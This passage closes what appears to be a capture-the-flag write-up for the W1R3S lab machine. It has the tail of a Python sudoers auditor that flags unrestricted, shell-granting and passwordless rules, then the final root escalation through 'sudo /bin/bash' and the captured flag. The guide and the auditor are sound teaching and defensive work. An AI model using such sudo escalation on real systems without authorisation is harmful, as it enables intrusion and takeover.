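    r"(?P<cmds>.+)$"
)
# Assumed list of binaries that hand the caller an interactive shell as the runas user.
SHELL_BINARIES = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh", "/usr/bin/bash", "/usr/bin/sh"}
SKIP_KEYWORDS = {"Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias"}


def parse_rule(line):
    """Split one user specification into its parts; returns None for non-rule lines."""
    m = RULE_RE.match(line)
    if not m:
        return None
    commands = [c.strip() for c in m.group("cmds").split(",")]
    tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
    # sudo's default runas_default is root when no (runas) list is given.
    runas = (m.group("runas") or "root").strip()
    return {"who": m.group("who"), "hosts": m.group("hosts"), "runas": runas,
            "tags": tags, "commands": commands}


def audit_sudoers(text):
    """Return one finding dict per user specification; Defaults, aliases and comments are skipped."""
    results = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.split()[0] in SKIP_KEYWORDS:
            continue
        rule = parse_rule(line)
        if rule is None:
            continue
        problems = []
        if "ALL" in rule["commands"]:
            problems.append("unrestricted: any command as %s (equivalent to root)" % rule["runas"])
        shells = [c for c in rule["commands"] if c.split()[0] in SHELL_BINARIES]
        if shells:
            problems.append("grants an interactive shell: %s" % ", ".join(shells))
        if "NOPASSWD" in rule["tags"]:
            problems.append("no password required")
        if any(p.startswith(("unrestricted", "grants")) for p in problems):
            severity = "high"
        elif problems:
            severity = "medium"
        else:
            severity = "ok"
        results.append({"who": rule["who"], "commands": rule["commands"],
                        "problems": problems, "severity": severity})
    return results


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding["severity"].upper(), finding["who"], finding["commands"], finding["problems"])
```

The deploy rule is what least privilege looks like in this file: specific binaries with fixed arguments and a password still required. Aliases and Defaults lines are skipped, so point it at the user-specification portion of /etc/sudoers and the drop-ins under /etc/sudoers.d.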

Escalate directly and grab the flag.

```text
w1r3s@W1R3S:~$ sudo /bin/bash
root@W1R3S:~# id
uid=0(root) gid=0(root) groups=0(root)
root@W1R3S:~# whoami
root
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___|
| | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \
| |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) |
\____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/

-----------------------------------------------------------------------------------------

.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ \______/]_
__...---'"""\_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / ` \
L__' \ -
- '-.
'. /
'-./

----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ \ / \/_ \______ \_____ \ / _____/
\ \/\/ / | || _/ _(__ < \_____ \
\ / | || | \/ \/ \
\__/\ / |___||____|_ /______ /_______ /.INC
\/ \/ \/ \/ CHALLENGE, V 1.0
----------------------------------------------------------------------------------------

CREATED BY SpecterWires

----------------------------------------------------------------------------------------
```

Summary

  • The ability to enumerate directories: this skill saves a lot of time, because in many cases it turns up interesting paths that serve as entry points.
  • The ability to search for vulnerabilities in running services: in this case, the CUPPA vulnerability was found with a simple Google search. Using vulnerability databases and search engines like Google saves a lot of time.

Game over

Sorry, this time I still did not find that Greek expert's foolproof one-click walkthrough script. I am so sorry about this... It's a pity...

The end, to be continued...